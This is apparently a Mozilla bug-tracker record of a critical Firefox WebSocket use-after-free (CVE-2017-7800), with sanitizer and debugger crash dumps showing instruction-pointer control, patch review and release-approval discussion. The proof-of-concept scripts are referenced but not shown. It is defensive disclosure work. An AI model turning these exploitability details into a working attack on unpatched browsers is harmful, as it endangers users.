    #1 0x7f892c5c8698 in _PR_CreateThread /home/thecoder/OpenSrc/firefox/nsprpub/pr/src/pthreads/ptthread.c:457:14
    #2 0x7f892c5c82aa in PR_CreateThread /home/thecoder/OpenSrc/firefox/nsprpub/pr/src/pthreads/ptthread.c:548:12
    #3 0x7f890e180897 in nsThread::Init(nsACString const&) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThread.cpp:685:8
    #4 0x7f8914b0eac0 in mozilla::dom::workers::WorkerThread::Create(mozilla::dom::workers::WorkerThreadFriendKey const&) /home/thecoder/OpenSrc/firefox/dom/workers/WorkerThread.cpp:90:7
    #5 0x7f89149e82a4 in mozilla::dom::workers::RuntimeService::ScheduleWorker(mozilla::dom::workers::WorkerPrivate*) /home/thecoder/OpenSrc/firefox/dom/workers/RuntimeService.cpp:1915:14
    #6 0x7f89149e5c8f in mozilla::dom::workers::RuntimeService::RegisterWorker(mozilla::dom::workers::WorkerPrivate*) /home/thecoder/OpenSrc/firefox/dom/workers/RuntimeService.cpp:1742:19
    #7 0x7f8914ae62b6 in mozilla::dom::workers::WorkerPrivate::Constructor(JSContext*, nsAString const&, bool, mozilla::dom::WorkerType, nsAString const&, nsACString const&, mozilla::dom::workers::WorkerLoadInfo*, mozilla::ErrorResult&) /home/thecoder/OpenSrc/firefox/dom/workers/WorkerPrivate.cpp:4660:8
    #8 0x7f8914ae5914 in Constructor /home/thecoder/OpenSrc/firefox/dom/workers/WorkerPrivate.cpp:4577:10
    #9 0x7f8914ae5914 in mozilla::dom::workers::WorkerPrivate::Constructor(mozilla::dom::GlobalObject const&, nsAString const&, mozilla::dom::WorkerOptions const&, mozilla::ErrorResult&) /home/thecoder/OpenSrc/firefox/dom/workers/WorkerPrivate.cpp:4518
    #10 0x7f891294efbe in mozilla::dom::WorkerBinding::_constructor(JSContext*, unsigned int, JS::Value*) /home/thecoder/OpenSrc/firefox/objdir-ff-asan/dom/bindings/WorkerBinding.cpp:973:68
    #11 0x7f891a34790b in CallJSNative /home/thecoder/OpenSrc/firefox/js/src/jscntxtinlines.h:293:15
    #12 0x7f891a34790b in CallJSNativeConstructor /home/thecoder/OpenSrc/firefox/js/src/jscntxtinlines.h:326
    #13 0x7f891a34790b in InternalConstruct(JSContext*, js::AnyConstructArgs const&) /home/thecoder/OpenSrc/firefox/js/src/vm/Interpreter.cpp:573
    #14 0x7f891a32e4c8 in ConstructFromStack /home/thecoder/OpenSrc/firefox/js/src/vm/Interpreter.cpp:599:12
    #15 0x7f891a32e4c8 in Interpret(JSContext*, js::RunState&) /home/thecoder/OpenSrc/firefox/js/src/vm/Interpreter.cpp:3059
    #16 0x7f891a315250 in js::RunScript(JSContext*, js::RunState&) /home/thecoder/OpenSrc/firefox/js/src/vm/Interpreter.cpp:410:12
    #17 0x7f891a3491cb in js::ExecuteKernel(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value const&, js::AbstractFramePtr, JS::Value*) /home/thecoder/OpenSrc/firefox/js/src/vm/Interpreter.cpp:699:15
    #18 0x7f891a349a49 in js::Execute(JSContext*, JS::Handle<JSScript*>, JSObject&, JS::Value*) /home/thecoder/OpenSrc/firefox/js/src/vm/Interpreter.cpp:731:12
    #19 0x7f891acf1bca in ExecuteScript(JSContext*, JS::AutoObjectVector&, JS::Handle<JSScript*>, JS::Value*) /home/thecoder/OpenSrc/firefox/js/src/jsapi.cpp:4635:12
    #20 0x7f8911622269 in nsJSUtils::ExecutionContext::CompileAndExec(JS::CompileOptions&, JS::SourceBufferHolder&, JS::MutableHandle<JSScript*>) /home/thecoder/OpenSrc/firefox/dom/base/nsJSUtils.cpp:267:8
    #21 0x7f8914fcaab5 in mozilla::dom::ScriptLoader::EvaluateScript(mozilla::dom::ScriptLoadRequest*) /home/thecoder/OpenSrc/firefox/dom/script/ScriptLoader.cpp:2118:20
    #22 0x7f8914fc669e in mozilla::dom::ScriptLoader::ProcessRequest(mozilla::dom::ScriptLoadRequest*) /home/thecoder/OpenSrc/firefox/dom/script/ScriptLoader.cpp:1722:10
    #23 0x7f8914fabe76 in mozilla::dom::ScriptLoader::ProcessScriptElement(nsIScriptElement*) /home/thecoder/OpenSrc/firefox/dom/script/ScriptLoader.cpp:1424:10
    #24 0x7f8914fa80fc in mozilla::dom::ScriptElement::MaybeProcessScript() /home/thecoder/OpenSrc/firefox/dom/script/ScriptElement.cpp:149:10
    #25 0x7f89105481ed in AttemptToExecute /home/thecoder/OpenSrc/firefox/objdir-ff-asan/dist/include/nsIScriptElement.h:225:18
    #26 0x7f89105481ed in nsHtml5TreeOpExecutor::RunScript(nsIContent*) /home/thecoder/OpenSrc/firefox/parser/html/nsHtml5TreeOpExecutor.cpp:698
    #27 0x7f8910541ab4 in nsHtml5TreeOpExecutor::RunFlushLoop() /home/thecoder/OpenSrc/firefox/parser/html/nsHtml5TreeOpExecutor.cpp:499:7
    #28 0x7f891057e2ab in nsHtml5ExecutorFlusher::Run() /home/thecoder/OpenSrc/firefox/parser/html/nsHtml5StreamParser.cpp:129:9
    #29 0x7f890e157a9f in mozilla::SchedulerGroup::Runnable::Run() /home/thecoder/OpenSrc/firefox/xpcom/threads/SchedulerGroup.cpp:368:14
    #30 0x7f890e186586 in nsThread::ProcessNextEvent(bool, bool*) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThread.cpp:1428:7
    #31 0x7f890e193b08 in NS_ProcessNextEvent(nsIThread*, bool) /home/thecoder/OpenSrc/firefox/xpcom/threads/nsThreadUtils.cpp:472:10
    #32 0x7f890f22bc91 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/thecoder/OpenSrc/firefox/ipc/glue/MessagePump.cpp:96:21
    #33 0x7f890f0fca78 in RunInternal /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:318:3
    #34 0x7f890f0fca78 in RunHandler /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:311
    #35 0x7f890f0fca78 in MessageLoop::Run() /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:291
    #36 0x7f89151319ff in nsBaseAppShell::Run() /home/thecoder/OpenSrc/firefox/widget/nsBaseAppShell.cpp:156:3
    #37 0x7f8919da4eb7 in XRE_RunAppShell() /home/thecoder/OpenSrc/firefox/toolkit/xre/nsEmbedFunctions.cpp:896:12
    #38 0x7f890f0fca78 in RunInternal /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:318:3
    #39 0x7f890f0fca78 in RunHandler /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:311
    #40 0x7f890f0fca78 in MessageLoop::Run() /home/thecoder/OpenSrc/firefox/ipc/chromium/src/base/message_loop.cc:291
    #41 0x7f8919da4404 in XRE_InitChildProcess(int, char**, XREChildData const*) /home/thecoder/OpenSrc/firefox/toolkit/xre/nsEmbedFunctions.cpp:712:7
    #42 0x4f6255 in content_process_main /home/thecoder/OpenSrc/firefox/browser/app/../../ipc/contentproc/plugin-container.cpp:64:19
    #43 0x4f6255 in main /home/thecoder/OpenSrc/firefox/browser/app/nsBrowserApp.cpp:286
    #44 0x7f892b1ba82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

SUMMARY: AddressSanitizer: heap-use-after-free /home/thecoder/OpenSrc/firefox/objdir-ff-asan/dist/include/nsCOMPtr.h:329:27 in assign_assuming_AddRef
Shadow bytes around the buggy address:
  0x0c2680012020: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2680012030: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2680012040: fd fd fd fd fd fa fa fa fa fa fa fa fa fa fa fa
  0x0c2680012050: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2680012060: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
=>0x0c2680012070: fd[fd]fd fd fd fd fd fd fd fd fa fa fa fa fa fa
  0x0c2680012080: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c2680012090: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c26800120a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c26800120b0: 00 00 00 00 00 00 00 00 fa fa fa fa fa fa fa fa
  0x0c26800120c0: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Heap right redzone:      fb
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack partial redzone:   f4
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
==2917==ABORTING
(Reporter)

Comment 2

2 years ago
A POC UAF_DisconnectInternal_POC_EIP_41414141.js is attached to demonstrate the clear exploitability by controlling the EIP register.

Firefox Version: 56.0a1 (2017-06-17) (32-bit)
OS: Widows 10 home 64 bit


(740.23a8): Access violation - code c0000005 (!!! second chance !!!)
eax=a1a1a1a1 ebx=1863b750 ecx=1863b750 edx=e5e5e5e5 esi=64136424 edi=1863b6a0
eip=41414141 esp=010fecdc ebp=010fece4 iopl=0         nv up ei ng nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210282
41414141 ??              ???



FAULTING_IP: 
unknown!noop+0
41414141 ??              ???

EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 41414141
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000008
   Parameter[1]: 41414141
Attempt to execute non-executable address 41414141


0x41414141
xul!mozilla::RefPtrTraits<mozilla::layers::LayersIPCChannel>::Release+0x6
xul!RefPtr<mozilla::layers::LayersIPCChannel>::ConstRemovingRefPtrTraits<mozilla::layers::LayersIPCChannel>::Release+0x6
xul!RefPtr<mozilla::layers::LayersIPCChannel>::assign_assuming_AddRef+0x18
xul!nsCOMPtr<nsIWeakReference>::operator=+0x9
xul!mozilla::dom::WebSocketImpl::DisconnectInternal+0x4b
xul!mozilla::dom::`anonymous namespace'::DisconnectInternalRunnable::MainThreadRun+0x8
xul!mozilla::dom::workers::WorkerMainThreadRunnable::Run+0x15
xul!mozilla::ThrottledEventQueue::Inner::ExecuteRunnable+0x6c
xul!mozilla::ThrottledEventQueue::Inner::Executor::Run+0xf
xul!mozilla::ThrottledEventQueue::Inner::ExecuteRunnable+0x6c
xul!mozilla::ThrottledEventQueue::Inner::Executor::Run+0xf
xul!nsThread::ProcessNextEvent+0x23a
xul!NS_ProcessNextEvent+0x14
xul!mozilla::ipc::MessagePump::Run+0x7a
xul!MessageLoop::RunInternal+0x8
xul!MessageLoop::RunHandler+0x20
xul!MessageLoop::Run+0x19
xul!nsBaseAppShell::Run+0x34
xul!nsAppShell::Run+0x26
Group: core-security → dom-core-security
Flags: sec-bounty?
Keywords: crash, csectype-uaf, sec-high, testcase
baku: you were recently in this code in bug 1369913 so this is probably freshest on your mind. This doesn't look like the same issue (Disconnect vs Send).
Flags: needinfo?(amarchesini)
Keywords: sec-high → sec-critical
(Assignee)

Updated

2 years ago
Assignee: nobody → amarchesini
Flags: needinfo?(amarchesini)
(Assignee)

Comment 4

2 years ago
Posted patch websocket.patch (obsolete) — Splinter Review
Attachment #8879832 - Flags: review?(bugs)
Comment on attachment 8879832 [details] [diff] [review]
websocket.patch

The callers of Disconnect() should keep the object alive, but I'm fine with this too since this is super simple to land to branches too.
Attachment #8879832 - Flags: review?(bugs) → review+
(Assignee)

Comment 6

2 years ago
Comment on attachment 8879832 [details] [diff] [review]
websocket.patch

[Security approval request comment]
How easily could an exploit be constructed based on the patch?

Yes. there is a test included.

Do comments in the patch, the check-in comment, or tests included in the patch paint a bulls-eye on the security problem?

Not particularly. I just keep WebSocketImpl alive before calling DisconnectInternal, instead after.

Which older supported branches are affected by this flaw?

all.

Do you have backports for the affected branches? If not, how different, hard to create, and risky will they be?

It's easy to backport.

How likely is this patch to cause regressions; how much testing does it need?

none.
Attachment #8879832 - Flags: sec-approval?
status-firefox54: --- → wontfix
status-firefox55: --- → affected
status-firefox56: --- → affected
status-firefox-esr52: --- → affected
tracking-firefox55: --- → +
tracking-firefox56: --- → +
tracking-firefox-esr52: --- → 55+
(In reply to Andrea Marchesini [:baku] from comment #6)
> Comment on attachment 8879832 [details] [diff] [review]
> websocket.patch
> 
> [Security approval request comment]
> How easily could an exploit be constructed based on the patch?
> 
> Yes. there is a test included.

This can't be checked in "as is" then.

Security bugs that need sec-approval can't have a test checked in with them as the test will 0day our users. 
We need the test and the fix separated into different patches and I can then sec-approval+ the fix and the test patch can land *after* we *ship* the fix in a final public release (such as Firefox 55).

The question above is more about "is this fix so obvious that checking in the fix points a giant sign as an exploitable security problem." I'll still need to understand the risk there when the patch is broken up.
Flags: needinfo?(amarchesini)
I see, now that I look at the patch, that there is no test so I guess this is a miscommunication.

I do see a Kungfu Deathgrip and, as Dan pointed out to me, the comment is kind of a give away, "DisconnectInternal() can release the object".

I'll give sec-approval+ but not for checkin until July 10, in the middle of the current development cycle.
Whiteboard: [checkin on 7/10]
Comment on attachment 8879832 [details] [diff] [review]
websocket.patch

Once this goes in, we'll want Beta and ESR52 patches nominated as well.
Attachment #8879832 - Flags: sec-approval? → sec-approval+
(Assignee)

Comment 10

2 years ago
> > Yes. there is a test included.
> 
> This can't be checked in "as is" then.

What I meant is that there is a script able to trigger the crash. This script is not included in the patch but it's available from the description of the bug.
Flags: needinfo?(amarchesini)
Yes, I see that. The sec-approval questions are about the checkin and patch since the bug won't be opened until after we ship. You have sec-approval+ to check in on July 10 or after.
https://hg.mozilla.org/integration/mozilla-inbound/rev/bc535203a6eff61f308eb8ddf13afe8268cccb9f

Note that the attached patch needed rebasing on trunk due to bug 1372453. The patch as-attached applies cleanly to Beta but will require a bit of trivial rebasing for ESR52. Please request Beta and ESR52 approval on the patch when you get a chance.
Flags: needinfo?(amarchesini)
Whiteboard: [checkin on 7/10]
https://hg.mozilla.org/mozilla-central/rev/bc535203a6ef
Status: NEW → RESOLVED
Last Resolved: 2 years ago
status-firefox56: affected → fixed
Resolution: --- → FIXED
Target Milestone: --- → mozilla56
(Assignee)

Comment 14

2 years ago
Patch rebased
Attachment #8879832 - Attachment is obsolete: true
Flags: needinfo?(amarchesini)
(Assignee)

Comment 15

2 years ago
Comment on attachment 8885156 [details] [diff] [review]
websocket.patch

Approval Request Comment
[Feature/Bug causing the regression]: WebSocket implementation
[User impact if declined]: The WebSocket object can be released before completing the Disconnect() operation. This is a UAF.
[Is this code covered by automated tests?]: no tests. race condition.
[Has the fix been verified in Nightly?]: none
[Needs manual test from QE? If yes, steps to reproduce]: none 
[List of other uplifts needed for the feature/fix]: none
[Is the change risky?]: no.
[Why is the change risky/not risky?]:  The ::Disconnect() method already uses a kungfuDeathGrip but this must be created at the beginning.
[String changes made/needed]: none
Attachment #8885156 - Flags: approval-mozilla-esr52?
Attachment #8885156 - Flags: approval-mozilla-beta?
Group: dom-core-security → core-security-release
Comment on attachment 8885156 [details] [diff] [review]
websocket.patch

sec-critical, beta55+, esr52.3+
Attachment #8885156 - Flags: approval-mozilla-esr52?
Attachment #8885156 - Flags: approval-mozilla-esr52+
Attachment #8885156 - Flags: approval-mozilla-beta?
Attachment #8885156 - Flags: approval-mozilla-beta+
(In reply to Andrea Marchesini [:baku] from comment #15)
> [Is this code covered by automated tests?]: no tests. race condition.
> [Has the fix been verified in Nightly?]: none
> [Needs manual test from QE? If yes, steps to reproduce]: none 

Setting qe-verify- based on Andrea's assessment on manual testing needs.
Flags: qe-verify-
Flags: sec-bounty? → sec-bounty+
Alias: CVE-2017-7800
Whiteboard: [adv-main55+][adv-esr52.3+]
(In reply to Looben Yang from comment #2)
> A POC UAF_DisconnectInternal_POC_EIP_41414141.js is attached to demonstrate
> the clear exploitability by controlling the EIP register.
> 
> Firefox Version: 56.0a1 (2017-06-17) (32-bit)
> OS: Widows 10 home 64 bit

I was not able to reproduce any kind of crash, let alone one showing EIP control, with these same conditions (except I'm using Win 10 Pro instead of Home). I also tried 64-bit Firefox builds to no avail.

With the original testcase I had been able to reproduce a UAF-looking crash both 32-bit and 64-bit Firefox 54.0.1 builds.
(Reporter)

Comment 21

2 years ago
(In reply to Daniel Veditz [:dveditz] from comment #20)
> (In reply to Looben Yang from comment #2)
> > A POC UAF_DisconnectInternal_POC_EIP_41414141.js is attached to demonstrate
> > the clear exploitability by controlling the EIP register.
> > 
> > Firefox Version: 56.0a1 (2017-06-17) (32-bit)
> > OS: Widows 10 home 64 bit
> 
> I was not able to reproduce any kind of crash, let alone one showing EIP
> control, with these same conditions (except I'm using Win 10 Pro instead of
> Home). I also tried 64-bit Firefox builds to no avail.
> 
> With the original testcase I had been able to reproduce a UAF-looking crash
> both 32-bit and 64-bit Firefox 54.0.1 builds.
(Reporter)

Comment 22

2 years ago
If it's not reproduced, then probably the timeout delay needs some adjustment.
I just simplified the PoC a little bit and attached it as UAF_DisconnectInternal_POC_EIP_41414141_2.js.

It seems a lot easier to reproduced in another machine. Daniel, can you give it a try with this one? 



Firefox Version: 54.0.1 (32-bit)
OS: Widows 10 Pro 64 bit

(6060.2b6c): Access violation - code c0000005 (!!! second chance !!!)
eax=a1a1a1a1 ebx=195676a8 ecx=195676a8 edx=e5e5e5e5 esi=11c6d760 edi=19567600
eip=41414141 esp=00eff29c ebp=00eff2a4 iopl=0         nv up ei ng nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210282
41414141 0000            add     byte ptr [eax],al          ds:002b:a1a1a1a1=41
0:000> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************

*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\WINDOWS\SysWOW64\nvwgf2um.dll - 
GetUrlPageData2 (WinHttp) failed: 12002.

FAULTING_IP: 
unknown!noop+0
41414141 0000            add     byte ptr [eax],al

EXCEPTION_RECORD:  (.exr -1)
ExceptionAddress: 41414141
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000008
   Parameter[1]: 41414141
Attempt to execute non-executable address 41414141

FAULTING_THREAD:  00002b6c

PROCESS_NAME:  firefox.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_PARAMETER1:  00000008

EXCEPTION_PARAMETER2:  41414141

WRITE_ADDRESS:  41414141 

FOLLOWUP_IP: 
unknown!noop+0
41414141 0000            add     byte ptr [eax],al

FAILED_INSTRUCTION_ADDRESS: 
unknown!noop+0
41414141 0000            add     byte ptr [eax],al

NTGLOBALFLAG:  400

APPLICATION_VERIFIER_FLAGS:  0

APP:  firefox.exe

ANALYSIS_VERSION: 10.0.10240.9 x86fre

IP_ON_HEAP:  41414141
The fault address in not in any loaded module, please check your build's rebase
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may
contain the address if it were loaded.

BUGCHECK_STR:  SOFTWARE_NX_FAULT_INVALID_FILL_PATTERN_a1a1a1a1

DEFAULT_BUCKET_ID:  SOFTWARE_NX_FAULT_INVALID_FILL_PATTERN_a1a1a1a1

LAST_CONTROL_TRANSFER:  from 0ff025b0 to 41414141

STACK_TEXT:  
WARNING: Frame IP not in any known module. Following frames may be wrong.
00eff298 0ff025b0 e5e5e5e5 00eff2d4 10bb616e 0x41414141
00eff2a4 10bb616e 00000000 00000000 1e2b7a30 xul!RefPtr<mozilla::dom::StyleSheetList>::assign_assuming_AddRef+0x18
00eff2d4 10bb9dda 101dd28e 1ea744c0 1ea744f4 xul!mozilla::dom::WebSocketImpl::DisconnectInternal+0x4b
00eff2d8 101dd28e 1ea744c0 1ea744f4 00000000 xul!mozilla::dom::`anonymous namespace'::DisconnectInternalRunnable::MainThreadRun+0x8
00eff2ec 100852eb 1e2b7a30 196e89c0 196e89f4 xul!mozilla::dom::workers::WorkerMainThreadRunnable::Run+0x15
00eff314 1008526f 00eff344 100852eb 1f466970 xul!mozilla::ThrottledEventQueue::Inner::ExecuteRunnable+0x76
00eff31c 100852eb 1f466970 0b7f5864 1e382670 xul!mozilla::ThrottledEventQueue::Inner::Executor::Run+0xe
00eff344 1008526f 00eff3c4 1001be8f 1e382670 xul!mozilla::ThrottledEventQueue::Inner::ExecuteRunnable+0x76
00eff34c 1001be8f 1e382670 02e27170 02e27160 xul!mozilla::ThrottledEventQueue::Inner::Executor::Run+0xe
00eff3c4 1001d5ba 02e04200 00000000 00eff3f7 xul!nsThread::ProcessNextEvent+0x244
00eff3f8 101cb809 02e25060 293a22ed 0b7f5860 xul!mozilla::ipc::MessagePump::Run+0x72
00eff430 101cb7d8 02e04200 00000001 0b7f5800 xul!MessageLoop::RunHandler+0x20
00eff450 100ef8ce 0b7f7640 00000000 00eff470 xul!MessageLoop::Run+0x19
00eff460 100ef65d 0b7f5860 0b7f7640 00eff484 xul!nsBaseAppShell::Run+0x34
00eff470 100ef612 0b7f5860 00eff7d5 0d5ce080 xul!nsAppShell::Run+0x26
00eff484 100eeee6 0b7f7640 00eff6f0 00eff6d8 xul!nsAppStartup::Run+0x22
00eff678 1011dfc1 02e03050 00eff824 00000001 xul!XREMain::XRE_mainRun+0xa92
00eff6b4 1011d93d 02e101c0 02e10220 00eff824 xul!XREMain::XRE_main+0x366
00eff7e4 1011d8ff 00eff824 00effb68 00341bdd xul!XRE_main+0x39
00eff7f0 00341bdd 00000001 02e03050 00eff824 xul!mozilla::BootstrapImpl::XRE_main+0x11
00effb68 00345b3f 00000001 fe1a4498 00fa7560 firefox!wmain+0x65d
00effbb0 77958744 00c1e000 77958720 4de8583d firefox!__scrt_common_main_seh+0xf9
00effbc4 77e6587d 00c1e000 4d87acba 00000000 KERNEL32!BaseThreadInitThunk+0x24
00effc0c 77e6584d ffffffff 77e8632e 00000000 ntdll!__RtlUserThreadStart+0x2f
00effc1c 00000000 00345bb5 00c1e000 00000000 ntdll!_RtlUserThreadStart+0x1b


SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  unknown!noop+0

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: unknown

IMAGE_NAME:  unknown.dll

DEBUG_FLR_IMAGE_TIMESTAMP:  0

STACK_COMMAND:  ~0s ; kb

BUCKET_ID:  SOFTWARE_NX_FAULT_INVALID_FILL_PATTERN_a1a1a1a1_BAD_IP_unknown!noop+0

PRIMARY_PROBLEM_CLASS:  SOFTWARE_NX_FAULT_INVALID_FILL_PATTERN_a1a1a1a1_BAD_IP_unknown!noop+0

FAILURE_PROBLEM_CLASS:  SOFTWARE_NX_FAULT_INVALID_FILL_PATTERN_a1a1a1a1

FAILURE_EXCEPTION_CODE:  c0000005

FAILURE_IMAGE_NAME:  unknown.dll

FAILURE_FUNCTION_NAME:  noop

FAILURE_SYMBOL_NAME:  unknown.dll!noop

FAILURE_BUCKET_ID:  SOFTWARE_NX_FAULT_INVALID_FILL_PATTERN_a1a1a1a1_c0000005_unknown.dll!noop

ANALYSIS_SOURCE:  UM

FAILURE_ID_HASH_STRING:  um:software_nx_fault_invalid_fill_pattern_a1a1a1a1_c0000005_unknown.dll!noop

FAILURE_ID_HASH:  {0b68b053-9232-2309-5b3f-b2f98916a7a4}

Followup:     MachineOwner
---------
Flags: needinfo?(dveditz)
That worked a lot better, especially when I switched to tinderbox builds instead of nightlies so they didn't keep auto-updating. Very reliably crashed executing 0x41414141 in a 32-bit build

bp-302daa81-58d5-411f-b463-89e940170721
bp-2882dd22-a602-4c21-ae88-6fe020170721

(I have no idea why it thinks the install time was two days ago. I just unzipped it shortly before running the testcase and submitting the crash, and the zip itself was packed on the build date last month).
Flags: needinfo?(dveditz)
Group: core-security-release
Component: DOM → DOM: Core & HTML
Product: Core → Core
You need to log in before you can comment on or make changes to this bug.